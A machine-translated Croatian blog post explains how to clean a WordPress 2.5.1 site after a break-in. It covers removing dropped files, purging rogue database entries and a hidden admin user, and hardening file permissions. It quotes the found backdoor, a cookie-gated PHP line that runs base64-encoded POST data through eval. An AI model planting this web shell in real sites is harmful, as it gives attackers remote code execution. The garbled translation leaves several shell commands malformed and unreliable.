WordPress Eksploatacija - Očistite virusne datoteke, SQL i sigurnost poslužitelja.

Prije nego što pročitate ovaj post, trebali biste vidjeti post ovdje, Da bi razumjeli nešto. :)

Pronašao sam ga u nekoliko datoteka na blogu na stealthsettings.com, kodovi slični onima prikazanim u nastavku kao rezultat zaraze virusom podvig od WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

xmlrpcAko gore je o datoteci xmlrpc.php od pospan, U grep poslužitelja, izgleda dosta ove vrste u source koda.

pppffiuuu

Čišćenje zaraženih datoteka:

Ooookkkk ...
1. Najbolje rješenje, kao što je to učinjeno rezervaI čisti baza je brisanje slika WordPress (wp-config.php i datoteke koje nisu strogo povezane s wp platformom možete zadržati s poslužitelja i prenijeti izvorne iz verzije 2.5.1 (Na tom prigodom i napraviti nadogradnju verzije :) wp) http://wordpress.org/download/ . Obrišite uključujući i tematski datoteke ako ne vjeruju da njihov pažljivoj provjeri.

Čini se da su pogođeni i slika od tema koje nisu korištene prije nego što se na blogu i jednostavno mijenjanje teme, ne riješiti problem.

./andreea/wp-content/themes/default/index.php:

2. Pretraživanje i brisanje svih datoteka koje sadrže:... * _new.php, * _old.php, * Jpgg, * Giff, * Pngg i wp-info.txt datoteku, ako ih ima.

pronaći. -ime “* _new.php”
pronaći. -ime “* _old.php”
pronaći. -ime "* .jpgg"
pronaći. -ime “* _giff”
pronaći. -ime “* _pngg”
pronaći. -ime “wp-info.txt”

3. u / Tmp , Pretraživanje i brisanje mape kao što su tmpYwbzT2

SQL čišćenje :

1. i Tablica wp_options Provjerite i brisanje linije: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Sve u wp_options, ići active_plugins i izbrisati ako postoji plugin koji završava u jednom od nastavaka * _new.php, * _old.php, *. jpgg, *. giff, *. pngg ili ako se sumnja na drugom lokalnom, pažljivo provjerite.

3. U tablici wp_users, Vidjeti postoji li korisnik koji nije napisao ništa u svojoj desnoj strani, stupac user_nicename. Izbrišite ovog korisnika, ali zapamtite broj u stupcu ID. Ovaj korisnik će vjerojatno koristiti "WordPress”Ca user_login stvara se i pojavljuje se na 00: 00: 00 0000-00-00.

4. Idi na tablici wp_usermeta i izbrisati sve linije koje pripadaju ID gore.

Nakon što izvršite ovo čišćenje SQL-a, onemogućite i aktivirajte bilo koji dodatak. (u blogu -> Nadzorna ploča -> Dodaci)

Sigurna poslužitelja:

1. Pogledajte što direktorije i datoteke "pisati"(chmod 777) i pokušajte staviti a chmod koji više neće dopuštati njihovo pisanje na bilo kojoj razini. (chmod 644, na primjer)

Pronađite. -Perm-2-LS

2. Pogledajte što slika postavljen bit suid ili SGID . Ako ne koristite te datoteke staviti na njih chmod 0 ili deinstalirati paket koji sadrži. Oni su vrlo opasni, jer oni izvršavati privilegije "skupina"Ili"korijen"Ne s normalnim korisnik povlastice izvršiti tu datoteku.

pronaći /-tip f-Perm-04000-LS
pronaći /-tip f-Perm-02000-LS

3. Provjerite što portovi su otvoreni i pokušajte zatvoriti ili osigurati onima koji se ne koriste.

netstat-| grep-i slušanje

Toliko. Vidim Neki blogovi su zabranjeni de Google Search a drugi kažu "Dobro ih je napravio!!!" . Pa, učinio bih to za njih... ali što kažete ako Google počne banovati sve web stranice formiranje  SPAM i staviti trojanaca (Trojan.Clicker.HTML) u kolačićima?

Strastveni zaljubljenik u tehnologiju, s veseljem pišem na StealthSettings.com od 2006. godine. Imam bogato iskustvo s operativnim sustavima: macOS, Windows i Linux, kao i s programskim jezicima i platformama za bloganje (WordPress) i za internetske trgovine (WooCommerce, Magento, PrestaShop).

kako » AntiVirus i sigurnost » WordPress Eksploatacija - Očistite virusne datoteke, SQL i sigurnost poslužitelja.

1 misao na "WordPress Iskorištavanje - Očistite virusne datoteke, SQL i sigurnost poslužitelja.”

Ostavite komentar